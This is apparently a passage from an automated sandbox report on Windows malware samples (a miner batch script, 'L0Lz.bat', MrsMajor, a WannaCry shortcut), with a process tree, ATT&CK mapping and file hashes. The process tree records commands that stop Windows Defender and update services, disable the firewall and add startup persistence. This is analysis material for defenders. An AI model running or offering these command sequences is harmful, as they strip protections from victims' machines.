  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffae058cc40,0x7ffae058cc4c,0x7ffae058cc58
    3⤵
    PID:1924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2060,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2052 /prefetch:2
    3⤵
    PID:3456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
    3⤵
    PID:408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2516 /prefetch:8
    3⤵
    PID:2300
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
    3⤵
    PID:4112
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3284,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3436 /prefetch:1
    3⤵
    PID:3208
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3728,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4540 /prefetch:1
    3⤵
    PID:5456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8
    3⤵
    PID:5448
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,12260682717186570881,18277470789907038877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8
    3⤵
    PID:5628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\BitcoinMiner.bat" "
  2⤵
  PID:4016
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\Downloads\L0Lz.bat" /f
    3⤵
    PID:5460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\L0Lz.bat"
  2⤵
  PID:4908
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:6120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:5848
- - C:\Windows\system32\net.exe
    net stop "SDRSVC"
    3⤵
    PID:2072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SDRSVC"
      4⤵
      PID:5836
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:2664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:5076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im "MSASCui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2632
- - C:\Windows\system32\net.exe
    net stop "security center"
    3⤵
    PID:1412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "security center"
      4⤵
      PID:3936
- - C:\Windows\system32\net.exe
    net stop sharedaccess
    3⤵
    PID:744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sharedaccess
      4⤵
      PID:4032
- - C:\Windows\system32\netsh.exe
    netsh firewall set opmode mode-disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4128
- - C:\Windows\system32\net.exe
    net stop "wuauserv"
    3⤵
    PID:1012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wuauserv"
      4⤵
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo tasklist "
    3⤵
    PID:344
- - C:\Windows\system32\find.exe
    find /I "L0Lz"
    3⤵
    PID:4904
- - C:\Windows\system32\xcopy.exe
    XCOPY "BitcoinMiner.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    3⤵
    - Drops startup file
    PID:1700
- - C:\Windows\system32\xcopy.exe
    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
    3⤵
    PID:4056
- - C:\Windows\system32\xcopy.exe
    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
    3⤵
    PID:5780
- - C:\Windows\system32\xcopy.exe
    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
    3⤵
    PID:3480
- - C:\Windows\system32\xcopy.exe
    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
    3⤵
    PID:5472
- - C:\Windows\system32\xcopy.exe
    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
    3⤵
    PID:2884
- C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
  "C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4056
- - C:\Users\Admin\Downloads\RKill_V2.9.1.064.exe
    C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:920
  - - C:\Windows\System32\Notepad.exe
      Notepad.exe C:\Users\Admin\Desktop\Rkill.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:6564
- C:\Program Files\VideoLAN\VLC\vlc.exe
  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\ConvertToCompress.WTV"
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1440
- C:\Program Files\VideoLAN\VLC\vlc.exe
  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\FindAdd.aif"
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2268
- C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
  "C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6600
- - C:\Users\Admin\Downloads\RKill_V2.9.1.064.exe
    C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6704
  - - C:\Windows\System32\Notepad.exe
      Notepad.exe C:\Users\Admin\Desktop\Rkill.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:6648
- C:\Users\Admin\Downloads\MrsMajor3.0.exe
  "C:\Users\Admin\Downloads\MrsMajor3.0.exe"
  2⤵
  PID:4276
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\3A49.tmp\3A4A.tmp\3A4B.vbs //Nologo
    3⤵
    PID:6056
  - - C:\Users\Admin\AppData\Local\Temp\3A49.tmp\eulascr.exe
      "C:\Users\Admin\AppData\Local\Temp\3A49.tmp\eulascr.exe"
      4⤵
      PID:6180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1936

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x418 0x498
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5688

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2572

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1748

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Browser Extensions

T1176

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
5e6c57ee573494749a63b2e7e1ca963c

SHA1
91540e60f9f6755f4e7597dfc173b333461ee87b

SHA256
73ff1a4fc896013c27e38c99eba60e49aba23f3a553ee0ca9e880427fa5c3fb6

SHA512
06d7b3bdf058d5b2446b38004b01204b33163491b6738491ace89309918062b12b5bb223cc37cbf9ce0a14ebeacba1084c081b6b9ab96f0352707cd7a8b30950

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\52177a6a-b932-402b-bcac-34cf9e1392a0.tmp

Filesize
2KB

MD5
6cba7806ebb153df9138307def6f9bc4

SHA1
0fd50bee4d9af8547eb65c305809f3bcc0ccf18d

SHA256
4496e8f01efb7ea3b92e6fbbe3a0acc26291bb90fc461c23f6b08aa7401e166d

SHA512
bd56052eae0cf7eb20859379adac4c5856afdeacd81ce46574c6784bccfe1db85d634fe3f764a84232c32e62a05a11999207c5108f5e1ab70850432b7504b719

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
6a8f9d29b9dccd930f5902a50055e1cc

SHA1
509265538b37365e37b76d57779075da112e9bb4

SHA256
6385414eec845474e1016d148b1c09b3062e236983e144debdda2c31e03130a1

SHA512
6cd64d9ea07317175fd326aa606f84646b4e35339c737cdffd6316626e2be2b2f1e52d2d9b188009b19a8d780be3aca7ecc3cad154ab06236b4b6640dafcadc2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
5b829762b5016ca10d4fa59e036fdef5

SHA1
1c04c57bd25e234a9fd91d5ec5cb3483a90a10a9

SHA256
60c2c5da18a139cf94cbee403e49ceb9dbe97046fe04aab04d69c22686847aab

SHA512
5e7c75eb3b30809b59dc8384f39f023afcabaffb0d5163b6c373fd06138e3f933257d76b88f9086a34f61d1fd070d8b563d7c996a7cedd7917d14619d7789296

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
5e50b63c4f4c43e40e1c0b2f5acb2ef9

SHA1
7100a79a179eb12fc92ad58f24fd5a18effe4a22

SHA256
e0cb45eacae521e095b085bf41f274709b5b4e6303e3980f01e26f8aa4852d49

SHA512
0a0695d2af3b77ff172d199e96edff6e7d10fb59fe3d4c1d74646514b4aa951e4ec2d54c33947d1710c9dc51338913ae42219fc2f8df44f17fe636bb649efa54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\84bdb8bf-bdc5-4a84-8e7f-b33bb888d5fd.tmp

Filesize
19KB

MD5
2b08fed4735705fc7a79199079062a84

SHA1
3d04a9c2454ade7131e396b60442534712a95391

SHA256
06d4489859ae985ca03fdd159f2e22d568cbbd711db6df26cefff6e810f387e1

SHA512
c39ba608a527249cc2281b5489ff79fc97ce3426cdc068b61a5e8a94b674880389ab597740deb0f11d61e4cae5612b1aa426dd3affddf31fdfc058f5f9dc2ab9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
47KB

MD5
2858579ad88ce0ac41fe7cb86d0b64a6

SHA1
607e133c6168bf97018adc994a67436058982170

SHA256
bc9fd3c75959a703df4c6435fae6f671bc8a2a48c7991a7b2e20a1c86a640691

SHA512
e719b991027670ccc95551dc77cce2204d31b336b39bb1ee0cc77700b83e2bba057836a847a8d990cd0a528b653e59dfc3fc3a08ac7722bc4585e6b07fb97e05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
67KB

MD5
fb2f02c107cee2b4f2286d528d23b94e

SHA1
d76d6b684b7cfbe340e61734a7c197cc672b1af3

SHA256
925dd883d5a2eb44cf1f75e8d71346b98f14c4412a0ea0c350672384a0e83e7a

SHA512
be51d371b79f4cc1f860706207d5978d18660bf1dc0ca6706d43ca0375843ec924aa4a8ed44867661a77e3ec85e278c559ab6f6946cba4f43daf3854b838bb82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
63KB

MD5
710d7637cc7e21b62fd3efe6aba1fd27

SHA1
8645d6b137064c7b38e10c736724e17787db6cf3

SHA256
c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

SHA512
19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
27KB

MD5
7153c0e56f2bd0b9d61cbe3c697e3bf1

SHA1
59c1a4ba00584dd66c94113e7d38b8fec194da14

SHA256
ecf4f22780a8de18840ba98100130e64734d0406893841ac7361a3d73903a2ae

SHA512
33a20aa2217b42b59bda70bde70681fb75c0e615c651a799849b71afa276114e77e15087f97b2db231e2dc66cd842f367355fb268f74714de51ff15d2112a37d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

Filesize
70KB

MD5
4308671e9d218f479c8810d2c04ea6c6

SHA1
dd3686818bc62f93c6ab0190ed611031f97fdfcf

SHA256
5addbdd4fe74ff8afc4ca92f35eb60778af623e4f8b5911323ab58a9beed6a9a

SHA512
5936b6465140968acb7ad7f7486c50980081482766002c35d493f0bdd1cc648712eebf30225b6b7e29f6f3123458451d71e62d9328f7e0d9889028bff66e2ad2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c

Filesize
16KB

MD5
bd17d16b6e95e4eb8911300c70d546f7

SHA1
847036a00e4e390b67f5c22bf7b531179be344d7

SHA256
9f9613a0569536593e3e2f944d220ce9c0f3b5cab393b2785a12d2354227c352

SHA512
f9647d2d7452ce30cf100aeb753e32203a18a1aaef7b45a4bc558397b2a38f63bfcfe174e26300317b7df176155ae4ebaee6bdf0d4289061860eff68236fe1bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004e

Filesize
16KB

MD5
96ac7a43df1667c2b0f871284c93acaa

SHA1
169c875ee2de5159043bf107e6b3aa4cc1234dd2

SHA256
9bb5bc611ebe4a6f4fc3685361cfa9f692afd7d093928e4603288e142748bed6

SHA512
fd8d7825821d4c65423aadf03f643a6e72b7811edc19bcd80cc3a6bcf43d31deb1ab9c75a8dfb3ac13f2323266b290480960d826faba53fe29c46930a3cba029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000050

Filesize
32KB

MD5
a9d361b528944077f73b28ddf7ea0659

SHA1
edb475690045fad688b7fc287ebae91201d1ec83

SHA256
129e890f90b8101d832f4b8c03adbce722103de98a7ead6425cb86dd4bd841cf

SHA512
f8ef1e37677b951661a4cab5d58d2b46d6856bdaa42e82ece4a5cdc229ee30e348849f59461c9e7b5b788852ddf91796ccba0030b8cced26d8f89450af45f116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000051

Filesize
42KB

MD5
23d5f558755a9d58eef69b2bfc9a5d99

SHA1
fa43092cb330dff8dc6c572cb8703b92286219f6

SHA256
6e5bec69b1c6424972a7f5481ac57049811f0f196535b707613126c11292c5cf

SHA512
9c56c94d059a27dab9f69c9dfd718382a8eb192b8c0ce91cd6db6ec0769b8756acf9c0956a35561474b87d6278b13fbe88a6e4df6260c278b1ae06e9be55dd6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000052

Filesize
138KB

MD5
9afc513740ab05eb5b789e9ce4220c9d

SHA1
cb071f6fa843f1421fe1a7b1c2ed50cff96187f8

SHA256
3c2d1de33dd8da54986f8f6b1b3343ed047d4d5e5672a1aafd0429b36c471a0b

SHA512
9a9ca415d534e41a5e5ee7f65fbfaf5810a72ca9a131205b84a4d65fd23c9fe05310cc745cbf25936ac1dfe1dbd3ba9e300716001a92fc9ab1a19318c6bbf533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000053

Filesize
17KB

MD5
8ad04f19bf70f5cf330752244dd8a5bf

SHA1
7076e75cfba995209d990ea6436cc1e35efccd2f

SHA256
8f9f6500a484f9c529b47669e78a5672a515ce00f9bd325b3e0d15d1d95de69c

SHA512
4b49abc56fc26aadf5dac9d76ab9a507592a59c797739f39cb5e8d2efdcffd2d37ca4c05c9e362aea17e3cbf16ebd86650baab5b3a672366fac8f5da72d79fb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000054

Filesize
19KB

MD5
24aafdc3de0100622ebdb778f8597cce

SHA1
eb596e0339976d95d67fbd03476bfc0893c32cee

SHA256
33f46c079504e967859cffb69162ab489c3b4bbe070af18253e60425cee34dd0

SHA512
b5c3b500e928d402526af4603e4e7b9e801bc9842f381dbbba75939c824aeb40d9ebbd3de1e2a155f690e8c9b9ce0efe6f3196739c031f74a428ac673dd1b185

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000055

Filesize
21KB

MD5
6bfa9162eadddf6d0c588ecae5bf97b8

SHA1
180ace45d284c8139b822cb377260720f390e266

SHA256
2afc61c281b47c5dd619404d850ccd452f2dcb068fe78474256c92c38f4a304d

SHA512
4888784fe7ed50f797e21e8c8697cf6cc684470d81f930ecb6311d224b236db14a1d55b9e2f32b52cf62250b580d64b2acff78298d0de208eff1bfd3f3120ae2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000056

Filesize
104KB

MD5
e85a88a15f443d63ecf00171e542c427

SHA1
4f49bd8e59bc347c6c4b0d668e61491be0f1d438

SHA256
238f1e74b4191a1a2773099fe40c64daeaa001fedf87931a5a2c9b1bd9edfd80

SHA512
4ff643bc038af2118f4671a2aa918396f8532a4d703487e7759003dd3c64f6988fc18648e4f5e67a3c7eba8225af98dd67f77b4cb6df871834a2c68c77eeeb62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000057

Filesize
95KB

MD5
c6bf24897c4c0900c8f66ad5290c9a32

SHA1
b6761917eba35167c1312903c447bd0ce1fb6236

SHA256
ae1bf905923aedbbc1a164e49a33c72d2481bacd5f2be39a0e2a1900056c9b7b

SHA512
a457907894c36e8f32cb2591f5dc8c835cdefb6abf9b28db5667860047e79ce1ab48e261bcd65e6d2ce3d99ea6e2962454458ba0444b439a9aa33e1762c650a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000058

Filesize
85KB

MD5
fffa466cdbf87968cbd6b5705987050f

SHA1
aef9c2e289577d52b0224ecb6851701387411cc8

SHA256
8d816ce32fddd1de97989b949763ac5e50b662c41e683dcd8aaeb067ec0ba5b9

SHA512
b4c0c7a1c86065c01b9685e306d6c91297c02940e16b4abfc66bc3c5de86ea2631e115143ad6e3e41ff363ee58129cdd2c9805e9d2742d83f860ee9fc09f04a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000059

Filesize
136KB

MD5
5b8ceb566d2a649edf7c2025e39ac16f

SHA1
61e290d8913cc2e76e0bf07357d0e9cf23117356

SHA256
897f1c519878fff0dd3f491faeaeca55b50e7f618a8c8aa9d385d087e1670b76

SHA512
97810b81b0b54819c546210c5eee4c7bf5adb501ee2df71dc7d85fc77ef706b8b14ce9c648b800b38712b4fd56a144a950a814f90e2df2f588f73a41feaf306a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005a

Filesize
149KB

MD5
4ace3a24f6d7e7d7ec6b736459637f8a

SHA1
1b4e18a224386d76486e2f0b8bfb0e66f186de05

SHA256
821c84c6867da80c22c5fb744aba6a4126e39c639ece2846481e006f3ac7703c

SHA512
7180eb2aa9a446ce7cd488acdb3b7b4b87aa56a503177fd13714fde1bca42bf4418674890d2ba25100dfe97af0d900a3cf0a1a44069dff676679226ccb130206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005b

Filesize
26KB

MD5
bdbca6cd39a21b94af5e37a7d95cd7b1

SHA1
3bbd7a9c40294b9f26a7fda297a07cf68f4274a8

SHA256
fa016fd584f843b1373b82746add6f4ecc0bd88711e9e85546dd9270e77cac50

SHA512
930121da974124d737bfd6971014a2127dd1e5c383eeb643d7eabc822c867068c261f7d978a2c86f2237a98053ae3dd26a00624d8f0233ed04b4d2c0f8ead102

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005c

Filesize
79KB

MD5
3d57e949838af147984a1584de0eaa41

SHA1
4b281e3f9037cde8e868c1f256474f48f08369f4

SHA256
76e3dfb5f1bc9da1103d454100e36b19440019a7eb6b7ea719d8ba66cb94baf7

SHA512
b9129db1132a2d5c2f282175c84e128771a810f19c29f9d8d7bfca6a873ec2f37d9657f522795559c8ec17d17e116b3ffd02346981c35401515af4cd04002a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005d

Filesize
20KB

MD5
3e4a1ef0df4352dd3def12ba265500fa

SHA1
77a6abf173d35b6ec8a6aaa6bbed72e87d200204

SHA256
843aa73cb46ba464de7be886d51e6e2450d5066695dd9e52525c78337d816d3d

SHA512
11b4a8bfac65f67d255fd9ea6be0c25da6033029629035551d8f23557b2ff2254bbb4c98bf76dff587898ea00f78bf61ab71a9acf33d766bbf6e7cf6113d1875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005f

Filesize
85KB

MD5
4028d14031bca0d8056f6770651320c3

SHA1
